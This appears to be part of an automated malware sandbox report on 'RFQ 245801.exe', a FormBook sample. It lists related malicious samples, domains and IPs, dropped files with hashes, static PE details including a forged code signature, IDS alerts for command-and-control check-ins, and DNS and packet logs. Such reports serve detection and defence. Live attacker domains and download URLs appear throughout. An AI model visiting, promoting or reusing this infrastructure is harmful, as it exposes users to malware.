                                                                                                                                                                                • meta.case-page-appeal.eu/assets/k9854w4e5136q5a-f2169603.png
                                                                                                                                                                                http://www.tkmall-wholesale.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                • www.tkmall-wholesale.com/
                                                                                                                                                                                c1#U09a6.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                • winfileshare.com/ticket_line/llb.php
                                                                                                                                                                                QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                • filetransfer.io/data-package/eZFzMENr/download
                                                                                                                                                                                QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                • filetransfer.io/data-package/eZFzMENr/download
                                                                                                                                                                                1tstvk3Sls.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                • microsoft-rage.world/Api/v3/qjqzqiiqayjq
                                                                                                                                                                                http://Asm.alcateia.orgGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                • asm.alcateia.org/

                                                                                                                                                                                Domains

                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                www.oko.eventshbwebdownload - MT 103.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                • 185.26.122.70
                                                                                                                                                                                docs.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                • 185.26.122.70
                                                                                                                                                                                Dekont.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                • 185.26.122.70
                                                                                                                                                                                Quotation #10091.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                • 185.26.122.70
                                                                                                                                                                                PAGO_200924.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                • 185.26.122.70
                                                                                                                                                                                www.j88.travel1024 Order.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                • 188.114.97.3
                                                                                                                                                                                hbwebdownload - MT 103.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                • 188.114.96.3
                                                                                                                                                                                docs.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                • 188.114.96.3
                                                                                                                                                                                SOA.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                • 188.114.96.3

                                                                                                                                                                                ASNs

                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                CLOUDFLARENETUSoriginal.emlGet hashmaliciousTycoon2FABrowse
                                                                                                                                                                                • 188.114.96.3
                                                                                                                                                                                https://globalairt.com/arull.php?7088797967704b536932307466507a53354b54456b744b3872584b3037555338375031633872445172564277413d1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                • 104.17.25.14
                                                                                                                                                                                74qgPmarBM.exeGet hashmaliciousPonyBrowse
                                                                                                                                                                                • 188.114.96.3
                                                                                                                                                                                http://twbcompany.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                • 104.21.7.183
                                                                                                                                                                                https://danielvasconcellos.com.br/cliente2024Get hashmaliciousPhisherBrowse
                                                                                                                                                                                • 188.114.97.3
                                                                                                                                                                                SecuriteInfo.com.Win64.Evo-gen.20301.32747.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                • 104.26.0.5
                                                                                                                                                                                https://bono-sicherheitstechniksharefile.btn-ebikes.com/Get hashmaliciousHtmlDropperBrowse
                                                                                                                                                                                • 104.18.95.41
                                                                                                                                                                                xwZfYpo16i.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, StealcBrowse
                                                                                                                                                                                • 172.67.206.204
                                                                                                                                                                                https://sportmansguilde.com/?https://www.office.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                • 104.18.95.41
                                                                                                                                                                                Portal.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                • 162.159.140.238

                                                                                                                                                                                JA3 Fingerprints

                                                                                                                                                                                No context

                                                                                                                                                                                Dropped Files

                                                                                                                                                                                No context

                                                                                                                                                                                Created / dropped Files

                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RFQ 245801.exe.log

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\Desktop\RFQ 245801.exe
                                                                                                                                                                                File Type:CSV text
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):2056
                                                                                                                                                                                Entropy (8bit):5.342567089024067
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:48:MxHKlYHKh3ouHgJHreylEHMHKo/tHo6hAHKzeRHKx1qHxvKHj:iqlYqh3ou0aymsqwtI6eqzqqxwRiD
                                                                                                                                                                                MD5:E518150A4E0AC0BB13C49E3437CAD6D1
                                                                                                                                                                                SHA1:EEB063C4020BB91C4F546B0D5AF9C4C446212A53
                                                                                                                                                                                SHA-256:80F14F1E93CC189B336F3B86EB76B1F874F2B05A222EC8C21FA0ED7D0D207706
                                                                                                                                                                                SHA-512:FCC2CF289AB4DEFFBE34BC5F390DB69942C6563F859B97945995E8899DFE1306081B5B55AE54779AC4B6A57BA4B265638D497B847D41E44681DF4B3C497C0A78
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase\4d760e3e4675c4a4c66b64205fb0d001\WindowsBase.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\17470ef0c7a174f38bdcadacc3e310ad\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\

                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):1172
                                                                                                                                                                                Entropy (8bit):5.3550249375369265
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:24:3OWSKco4KmZjKbmOIKod6emZ9tYs4RPQoUEJ0gt/NKIl9iagu:eWSU4xympjmZ9tz4RIoUl8NDv
                                                                                                                                                                                MD5:D66C47B8DC1712C9019C2CA1A29A7224
                                                                                                                                                                                SHA1:027D8E43DB55EB21BE139D06CCAD686648485565
                                                                                                                                                                                SHA-256:217A7B18569319440E4C429C91D9ECD917765DF0037D0CD19E3072BE7126BC38
                                                                                                                                                                                SHA-512:B2121B19348C8DD0204496EDA12D3416BE199284A307A13FEC0A7FD8FFD0F89511B9C110AE369049951ED27DD59E892153FE5E63600C3E7315A598DB5BB21F31
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview:@...e................................................@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5cjlcnpt.v03.psm1

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kmjugcnc.ktu.psm1

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qmpfsdf0.kdq.ps1

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vjbhpxlk.0ac.ps1

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                Static File Info

                                                                                                                                                                                General

                                                                                                                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                Entropy (8bit):7.923981643250274
                                                                                                                                                                                TrID:
                                                                                                                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                                                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 49.93%
                                                                                                                                                                                • Windows Screen Saver (13104/52) 0.07%
                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                                • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                                File name:RFQ 245801.exe
                                                                                                                                                                                File size:713'736 bytes
                                                                                                                                                                                MD5:4be29153bc863fa6d2914aab9759e6aa
                                                                                                                                                                                SHA1:eb30dab7d18b7bbf2673573cc96da82f6374d85b
                                                                                                                                                                                SHA256:ffaa78a8a97885716e7dbe2a4a7ed9e1593ea5690f02f79f5d63c9b4964559da
                                                                                                                                                                                SHA512:f3b861ecec9500c4ef20a4750c78b7505d42be16a9bfc3473fd8270720409a7a331af4d423f7bffc3065873a654a23370ebc229ecbfad591dae5dbf2239a9e29
                                                                                                                                                                                SSDEEP:12288:P1A+f0e7eDuu9f8ZYDrQ1I6030Ro1JPCnW3tQsBRwdFKPQhilBr4E1Pm6/cOkR:Prx4rb30RovKW3rReFSQIv1Q6/u
                                                                                                                                                                                TLSH:38E41254271CE714C30D47F951D2C612A3B95A28FE5ACF387ACBB08D08E77156A32ADE
                                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....b.g..............0......(........... ........@.. ....................... ............@................................

                                                                                                                                                                                File Icon

                                                                                                                                                                                Icon Hash:878eb7a3a6879fa4

                                                                                                                                                                                Static PE Info

                                                                                                                                                                                General

                                                                                                                                                                                Entrypoint:0x4aa3d2
                                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                                Digitally signed:true
                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                Time Stamp:0x6703621E [Mon Oct 7 04:22:54 2024 UTC]
                                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                                OS Version Major:4
                                                                                                                                                                                OS Version Minor:0
                                                                                                                                                                                File Version Major:4
                                                                                                                                                                                File Version Minor:0
                                                                                                                                                                                Subsystem Version Major:4
                                                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                                                Authenticode Signature

                                                                                                                                                                                Signature Valid:false
                                                                                                                                                                                Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                                                                                                                                                                Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                Error Number:-2146869232
                                                                                                                                                                                Not Before, Not After
                                                                                                                                                                                • 13/11/2018 00:00:00 08/11/2021 23:59:59
                                                                                                                                                                                Subject Chain
                                                                                                                                                                                • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                                                                                                                                                                Version:3
                                                                                                                                                                                Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                                                                                                                                                                Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                                                                                                                                                                Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                                                                                                                                                                Serial:7C1118CBBADC95DA3752C46E47A27438

                                                                                                                                                                                Entrypoint Preview

                                                                                                                                                                                Instruction
                                                                                                                                                                                jmp dword ptr [00402000h]
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al

                                                                                                                                                                                Data Directories

                                                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xaa3800x4f.text
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xac0000x246c.rsrc
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0xaae000x3608
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xb00000xc.reloc
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                Sections

                                                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                .text0x20000xa83d80xa8400d503aa12c819c778c4fc37c3b62ed022False0.9173578542904903data7.932697234212169IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                .rsrc0xac0000x246c0x26000a3b5d7b4e5ada3f7748dd075af5626aFalse0.869140625data7.367091566139885IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                .reloc0xb00000xc0x200fc0cbfef40948809e337141340bf60aeFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                Resources

                                                                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                RT_ICON0xac0c80x201dPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9674005595426347
                                                                                                                                                                                RT_GROUP_ICON0xae0f80x14data1.05
                                                                                                                                                                                RT_VERSION0xae11c0x34cdata0.43838862559241704

                                                                                                                                                                                Imports

                                                                                                                                                                                DLLImport
                                                                                                                                                                                mscoree.dll_CorExeMain

                                                                                                                                                                                Network Behavior

                                                                                                                                                                                Suricata IDS Alerts

                                                                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                2024-10-07T14:47:43.845330+02002031412ET MALWARE FormBook CnC Checkin (GET)1192.168.2.449743188.114.96.380TCP
                                                                                                                                                                                2024-10-07T14:47:43.845330+02002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.2.449743188.114.96.380TCP
                                                                                                                                                                                2024-10-07T14:47:43.845330+02002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.2.449743188.114.96.380TCP
                                                                                                                                                                                2024-10-07T14:48:45.319943+02002031412ET MALWARE FormBook CnC Checkin (GET)1192.168.2.450012185.26.122.7080TCP
                                                                                                                                                                                2024-10-07T14:48:45.319943+02002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.2.450012185.26.122.7080TCP
                                                                                                                                                                                2024-10-07T14:48:45.319943+02002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.2.450012185.26.122.7080TCP

                                                                                                                                                                                Network Port Distribution

                                                                                                                                                                                TCP Packets

                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                Oct 7, 2024 14:47:43.390790939 CEST4974380192.168.2.4188.114.96.3
                                                                                                                                                                                Oct 7, 2024 14:47:43.395668983 CEST8049743188.114.96.3192.168.2.4
                                                                                                                                                                                Oct 7, 2024 14:47:43.395895004 CEST4974380192.168.2.4188.114.96.3
                                                                                                                                                                                Oct 7, 2024 14:47:43.395895004 CEST4974380192.168.2.4188.114.96.3
                                                                                                                                                                                Oct 7, 2024 14:47:43.400789976 CEST8049743188.114.96.3192.168.2.4
                                                                                                                                                                                Oct 7, 2024 14:47:43.844379902 CEST8049743188.114.96.3192.168.2.4
                                                                                                                                                                                Oct 7, 2024 14:47:43.844783068 CEST4974380192.168.2.4188.114.96.3
                                                                                                                                                                                Oct 7, 2024 14:47:43.845257044 CEST8049743188.114.96.3192.168.2.4
                                                                                                                                                                                Oct 7, 2024 14:47:43.845330000 CEST4974380192.168.2.4188.114.96.3
                                                                                                                                                                                Oct 7, 2024 14:47:43.849721909 CEST8049743188.114.96.3192.168.2.4

                                                                                                                                                                                UDP Packets

                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                Oct 7, 2024 14:47:43.377798080 CEST5503653192.168.2.41.1.1.1
                                                                                                                                                                                Oct 7, 2024 14:47:43.390223026 CEST53550361.1.1.1192.168.2.4
                                                                                                                                                                                Oct 7, 2024 14:48:03.858387947 CEST5174453192.168.2.41.1.1.1
                                                                                                                                                                                Oct 7, 2024 14:48:03.874089003 CEST53517441.1.1.1192.168.2.4
                                                                                                                                                                                Oct 7, 2024 14:48:24.486824036 CEST6031753192.168.2.41.1.1.1
                                                                                                                                                                                Oct 7, 2024 14:48:24.497123003 CEST53603171.1.1.1192.168.2.4
                                                                                                                                                                                Oct 7, 2024 14:48:44.676063061 CEST5470653192.168.2.41.1.1.1
                                                                                                                                                                                Oct 7, 2024 14:48:44.817770004 CEST53547061.1.1.1192.168.2.4
                                                                                                                                                                                Oct 7, 2024 14:49:05.127173901 CEST5966253192.168.2.41.1.1.1
                                                                                                                                                                                Oct 7, 2024 14:49:05.136404037 CEST53596621.1.1.1192.168.2.4
                                                                                                                                                                                Oct 7, 2024 14:49:25.478270054 CEST5127553192.168.2.41.1.1.1
                                                                                                                                                                                Oct 7, 2024 14:49:25.487400055 CEST53512751.1.1.1192.168.2.4
                                                                                                                                                                                Oct 7, 2024 14:49:45.910301924 CEST6106353192.168.2.41.1.1.1
                                                                                                                                                                                Oct 7, 2024 14:49:46.085643053 CEST53610631.1.1.1192.168.2.4
                                                                                                                                                                                Oct 7, 2024 14:50:06.300168991 CEST5134053192.168.2.41.1.1.1
                                                                                                                                                                                Oct 7, 2024 14:50:06.394150019 CEST53513401.1.1.1192.168.2.4
                                                                                                                                                                                Oct 7, 2024 14:50:26.721621990 CEST5414653192.168.2.41.1.1.1
                                                                                                                                                                                Oct 7, 2024 14:50:26.733623981 CEST53541461.1.1.1192.168.2.4
                                                                                                                                                                                Oct 7, 2024 14:50:47.188524008 CEST6221753192.168.2.41.1.1.1
                                                                                                                                                                                Oct 7, 2024 14:50:47.283157110 CEST53622171.1.1.1192.168.2.4
                                                                                                                                                                                Oct 7, 2024 14:51:29.924470901 CEST5324553192.168.2.41.1.1.1
                                                                                                                                                                                Oct 7, 2024 14:51:29.935204029 CEST53532451.1.1.1192.168.2.4

                                                                                                                                                                                DNS Queries

                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                Oct 7, 2024 14:47:43.377798080 CEST192.168.2.41.1.1.10x5163Standard query (0)www.j88.travelA (IP address)IN (0x0001)false
                                                                                                                                                                                Oct 7, 2024 14:48:03.858387947 CEST192.168.2.41.1.1.10xc38dStandard query (0)www.venir-bienne.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                Oct 7, 2024 14:48:24.486824036 CEST192.168.2.41.1.1.10x14bfStandard query (0)www.ridges-freezers-56090.bondA (IP address)IN (0x0001)false
                                                                                                                                                                                Oct 7, 2024 14:48:44.676063061 CEST192.168.2.41.1.1.10x984Standard query (0)www.oko.eventsA (IP address)IN (0x0001)false
